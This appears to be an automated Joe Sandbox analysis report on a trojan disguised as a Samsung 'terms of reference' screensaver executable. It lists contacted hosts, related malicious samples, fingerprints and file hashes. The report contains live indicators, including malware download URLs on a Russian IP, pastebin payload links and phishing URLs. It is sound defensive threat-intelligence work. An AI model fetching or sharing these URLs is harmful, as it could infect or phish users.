                                                                                                                                              http://schemas.datacontract.org/2004/07/dhttp://schemas.datacontract.org/2004/07/System.XmlRhttp://wTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              http://schemas.datacontract.org/2004/07/System.Xml.LinqTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              http://89.23.97.214/TeamBuild/win32_svchost.exehttp://89.23.97.214/TeamBuild/win64_svchost.exewin32_Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776400000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              https://github.com/dotnet/linker/issues/2715.Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167776836.000002980C420000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166830112.000002980BDC1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://github.com/dotnet/runtime/issues/50820Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166893087.000002980BE32000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://aka.ms/GlobalizationInvariantModeTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://schemas.datacontract.org/2004/07/System.IOTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://aka.ms/pscore68powershell.exe, 00000002.00000002.2107852680.0000029BB5691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2110018131.000001F700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2239791805.0000014440AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://pastebin.compowershell.exe, 00000004.00000002.2110018131.000001F7015DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://pastebin.compowershell.exe, 00000004.00000002.2110018131.000001F700C32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://aka.ms/dotnet-illink/nativehostTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808F13000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://aka.ms/dotnet/downloadTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188177414.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000000.2057822710.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://schemas.datacontract.org/2004/07/SystemYTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                http://crl.microspowershell.exe, 00000009.00000002.2338412059.0000014458E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high

                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                  Public IPs

                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                  208.95.112.1
                                                                                                                                                                  		ip-api.comUnited States
                                                                                                                                                                  		53334TUT-ASUSfalse
                                                                                                                                                                  149.154.167.220
                                                                                                                                                                  		api.telegram.orgUnited Kingdom
                                                                                                                                                                  		62041TELEGRAMRUfalse
                                                                                                                                                                  172.67.19.24
                                                                                                                                                                  		pastebin.comUnited States
                                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                                  89.23.97.214
                                                                                                                                                                  		unknownRussian Federation
                                                                                                                                                                  		48687MAXITEL-ASRUfalse
                                                                                                                                                                  172.67.74.152
                                                                                                                                                                  		api.ipify.orgUnited States
                                                                                                                                                                  		13335CLOUDFLARENETUSfalse

                                                                                                                                                                  General Information

                                                                                                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                  Analysis ID:1617329
                                                                                                                                                                  Start date and time:2025-02-17 18:56:16 +01:00
                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                  Overall analysis duration:0h 7m 43s
                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                  Report type:full
                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                  Number of analysed new started processes analysed:13
                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                  Technologies:
                                                                                                                                                                  • HCA enabled
                                                                                                                                                                  • EGA enabled
                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                  Sample name:Terms_of_reference_06_01_2025_samsung.scr.exe
                                                                                                                                                                  Detection:MAL
                                                                                                                                                                  Classification:mal100.troj.expl.evad.winEXE@14/17@5/5
                                                                                                                                                                  EGA Information:
                                                                                                                                                                  • Successful, ratio: 66.7%
                                                                                                                                                                  HCA Information:Failed
                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                  • Found application associated with file extension: .exe

                                                                                                                                                                  Warnings

                                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197, 20.242.39.171
                                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 4084 because it is empty
                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                  Simulations

                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                  12:57:11API Interceptor57x Sleep call for process: powershell.exe modified

                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                  IPs

                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  208.95.112.1Contract for Partners.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • ip-api.com/json/8.46.123.189
                                                                                                                                                                  JV4lf0wkWV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • ip-api.com/json/8.46.123.189
                                                                                                                                                                  BAMParser.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                  • ip-api.com/line/?fields=hosting
                                                                                                                                                                  Fatality-unpadded.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                  • ip-api.com/line/?fields=hosting
                                                                                                                                                                  1111.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • www.ip-api.com/line/?fields=16401
                                                                                                                                                                  1111.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • www.ip-api.com/line/?fields=16401
                                                                                                                                                                  Xworm-V5.6.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                  • ip-api.com/line/?fields=hosting
                                                                                                                                                                  KNT3NUxTeD.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                  • ip-api.com/line/?fields=hosting
                                                                                                                                                                  Nueva Orden de Compra.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                  • ip-api.com/json/
                                                                                                                                                                  Bind.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • ip-api.com/json
                                                                                                                                                                  149.154.167.220JV4lf0wkWV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    Nonmerchantable.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                      JUSTIFICANTE DE TRANSFERENCIA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                        copia_01929pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                          JUSTIF. PAGO AQUISGRANpdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                            INQUIRYS#87636_5_PACKAGING_VIET_NAM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                              Hermaean.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                facturar.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  Justificante de pago.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                    siparis po1_ BYZ01072410 - Turkiye CRSP0177462 fiyat teklifi 01024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                      172.67.19.24rrats.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                      • pastebin.com/raw/KKpnJShN
                                                                                                                                                                                      sys_upd.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                      • pastebin.com/raw/sA04Mwk2
                                                                                                                                                                                      cr_asm_menu..ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                      • pastebin.com/raw/sA04Mwk2
                                                                                                                                                                                      cr_asm2.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                      • pastebin.com/raw/sA04Mwk2
                                                                                                                                                                                      cr_asm_phshop..ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                      • pastebin.com/raw/sA04Mwk2
                                                                                                                                                                                      VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                      • pastebin.com/raw/sA04Mwk2
                                                                                                                                                                                      HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • pastebin.com/raw/sA04Mwk2
                                                                                                                                                                                      xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • pastebin.com/raw/sA04Mwk2
                                                                                                                                                                                      steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • pastebin.com/raw/sA04Mwk2
                                                                                                                                                                                      cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                      • pastebin.com/raw/sA04Mwk2

                                                                                                                                                                                      Domains

                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                      pastebin.comContract for Partners.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 172.67.19.24
                                                                                                                                                                                      JV4lf0wkWV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 104.20.3.235
                                                                                                                                                                                      XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                      • 104.20.4.235
                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                      • 104.20.3.235
                                                                                                                                                                                      FD7F#U007e1.EXE.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                      • 172.67.19.24
                                                                                                                                                                                      FD7F#U007e1.EXE.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                      • 104.20.4.235
                                                                                                                                                                                      Paketfoto_pdf.vbsGet hashmaliciousXWormBrowse
                                                                                                                                                                                      • 172.67.19.24
                                                                                                                                                                                      #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                      • 104.20.4.235
                                                                                                                                                                                      #Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                      • 172.67.19.24
                                                                                                                                                                                      #Ud835#Uddb2#Ud835#Udda4#Ud835#Uddb3#Ud835#Uddb4#Ud835#Uddaf.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                      • 104.20.4.235
                                                                                                                                                                                      ip-api.comContract for Partners.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                      JV4lf0wkWV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                      BAMParser.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                      Fatality-unpadded.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                      1111.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                      1111.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                      Xworm-V5.6.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                      KNT3NUxTeD.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                      Nueva Orden de Compra.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                      Bind.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                      api.telegram.orgJV4lf0wkWV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                      Nonmerchantable.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                      JUSTIFICANTE DE TRANSFERENCIA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                      copia_01929pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                      JUSTIF. PAGO AQUISGRANpdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                      INQUIRYS#87636_5_PACKAGING_VIET_NAM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                      Hermaean.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                      facturar.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                      Justificante de pago.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                      siparis po1_ BYZ01072410 - Turkiye CRSP0177462 fiyat teklifi 01024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                      api.ipify.orgContract for Partners.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 172.67.74.152
                                                                                                                                                                                      JV4lf0wkWV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 172.67.74.152
                                                                                                                                                                                      ZIOpctBE0o.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                      • 172.67.74.152
                                                                                                                                                                                      copia_01929pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                      • 104.26.13.205
                                                                                                                                                                                      Doc 1189623388009.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                      • 104.26.12.205
                                                                                                                                                                                      play.wav.htmGet hashmaliciousHtmlDropperBrowse
                                                                                                                                                                                      • 104.26.12.205
                                                                                                                                                                                      CheckList Job no.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                      • 172.67.74.152
                                                                                                                                                                                      http://nodeissuesfix.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 104.26.13.205
                                                                                                                                                                                      https://business.secure-accounts-security.com/wp-content/.htaccessGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 104.26.12.205
                                                                                                                                                                                      NexoPack Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 104.26.12.205

                                                                                                                                                                                      ASNs

                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                      MAXITEL-ASRUJV4lf0wkWV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 89.23.98.26
                                                                                                                                                                                      8MFZ4GzHgb.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                      • 89.23.101.77
                                                                                                                                                                                      SecuriteInfo.com.Trojan.MulDrop29.5208.14569.1678.exeGet hashmaliciousPureCrypter, AsyncRATBrowse
                                                                                                                                                                                      • 89.23.102.248
                                                                                                                                                                                      SecuriteInfo.com.Trojan.MulDrop29.5208.14569.1678.exeGet hashmaliciousPureCrypter, AsyncRATBrowse
                                                                                                                                                                                      • 89.23.102.248
                                                                                                                                                                                      lO5lV39HDj.exeGet hashmaliciousDarkTortilla, QuasarBrowse
                                                                                                                                                                                      • 89.23.99.249
                                                                                                                                                                                      Fixer.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                      • 89.23.101.77
                                                                                                                                                                                      cyOFt8NElN.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                      • 89.23.97.211
                                                                                                                                                                                      nATCTqtxP7.exeGet hashmaliciousOrcusBrowse
                                                                                                                                                                                      • 89.23.102.157
                                                                                                                                                                                      Ts3uGfdkae.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 89.23.107.219
                                                                                                                                                                                      hz7DzW2Yop.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                      • 89.23.100.242
                                                                                                                                                                                      TELEGRAMRUJV4lf0wkWV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                      Nonmerchantable.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                      updater.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                      JUSTIFICANTE DE TRANSFERENCIA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                      copia_01929pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                      JUSTIF. PAGO AQUISGRANpdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                      INQUIRYS#87636_5_PACKAGING_VIET_NAM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                      Hermaean.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                      facturar.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                      Justificante de pago.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                      CLOUDFLARENETUSContract for Partners.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 172.67.74.152
                                                                                                                                                                                      JV4lf0wkWV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 172.67.74.152
                                                                                                                                                                                      https://www.buildwithbrick.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                      ZIOpctBE0o.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                      • 172.67.74.152
                                                                                                                                                                                      https://rpqffvhbb.cc.rs6.net/tn.jsp?f=0014kcclQXjPXojT0ti9V52RcXl4z4Vz--beWhEpNrqnLWHxys4qF9LPuo_spJkGtd99wCHXIF8SrjNw5f7C7a4uHYln_cY2bKtw_9grTGpKhyUdMN54rd5jGq9iXvjTQ_1ZqPOlcyaJO5i6eVirYCS-Aw8Yj3ZjuVLOe5I_meMvRPB2ZFMGWUJnIhs01nCTgS6IU1DHYOHg0cPeTM9oCls9zcwREma1URiZR_mcbieP3coMGuF7tAZZKkqIGQi3B0QOls2fxlpqFxzOMHmfXgLkQ==&c=m9vJ9fSAy80r925LymjLMH-zd09aiPFcNFYgM-NaI83_5TV5j31yRA==&ch=metbn8RrmYKdxQqAH_UNs4zoTXwjYFbMJ4QbLNi8NvHcFYJaLDgOEA==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                      https://adfs-OZrtY7DQglHoAZotD0jKGmDz9af367vOzfOaftUDQT6I4YZH3E.lumpnk.ru/vXsP8/###9jbuxkemper@louisianaspine.orgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 104.16.2.189
                                                                                                                                                                                      https://www.buildwithbrick.com/Get hashmaliciousAnonymous ProxyBrowse
                                                                                                                                                                                      • 104.17.25.14
                                                                                                                                                                                      https://na4.docusign.net/Signing/EmailStart.aspx?a=3c56b97e-f52b-41fb-a108-03e6f0b98497&etti=24&acct=64ac2e03-602c-40bb-a404-aa2fbcd4cb57&er=c83d01c5-2226-4002-b236-f161c9bed457Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                      • 104.18.87.42
                                                                                                                                                                                      mMS2hfsyJd.imgGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                      • 104.21.16.1
                                                                                                                                                                                      2025 Q1 Staff Pay Adjustment-Handbook.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                      • 104.17.25.14
                                                                                                                                                                                      TUT-ASUSContract for Partners.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                      JV4lf0wkWV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                      BAMParser.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                      Fatality-unpadded.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                      1111.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                      1111.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                      Xworm-V5.6.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                      KNT3NUxTeD.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                      Nueva Orden de Compra.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                      Bind.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 208.95.112.1

                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0eContract for Partners.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 172.67.19.24
                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                      JV4lf0wkWV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 172.67.19.24
                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                      https://www.buildwithbrick.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 172.67.19.24
                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                      BN.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                      • 172.67.19.24
                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                      sHsYUp3BAs.exeGet hashmaliciousDragonForceBrowse
                                                                                                                                                                                      • 172.67.19.24
                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                      cool.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                      • 172.67.19.24
                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                      cool.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                      • 172.67.19.24
                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                      Bi7E8ewP40.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                      • 172.67.19.24
                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                      bIJyZ1RcHG.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                      • 172.67.19.24
                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                      Bi7E8ewP40.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                      • 172.67.19.24
                                                                                                                                                                                      • 149.154.167.220

                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                      No context

                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:modified
                                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                                      Entropy (8bit):0.34726597513537405
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:Nlll:Nll
                                                                                                                                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                                                      Preview:@...e...........................................................

                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\RES792.tmp

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Mon Feb 17 19:48:26 2025, 1st section name ".debug$S"
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1336
                                                                                                                                                                                      Entropy (8bit):3.988567256280001
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:H2m9p4HybZHJwKqxmNWI+ycuZhNvakSRPNnqSSd:psASKqxm41ulva3jqSC
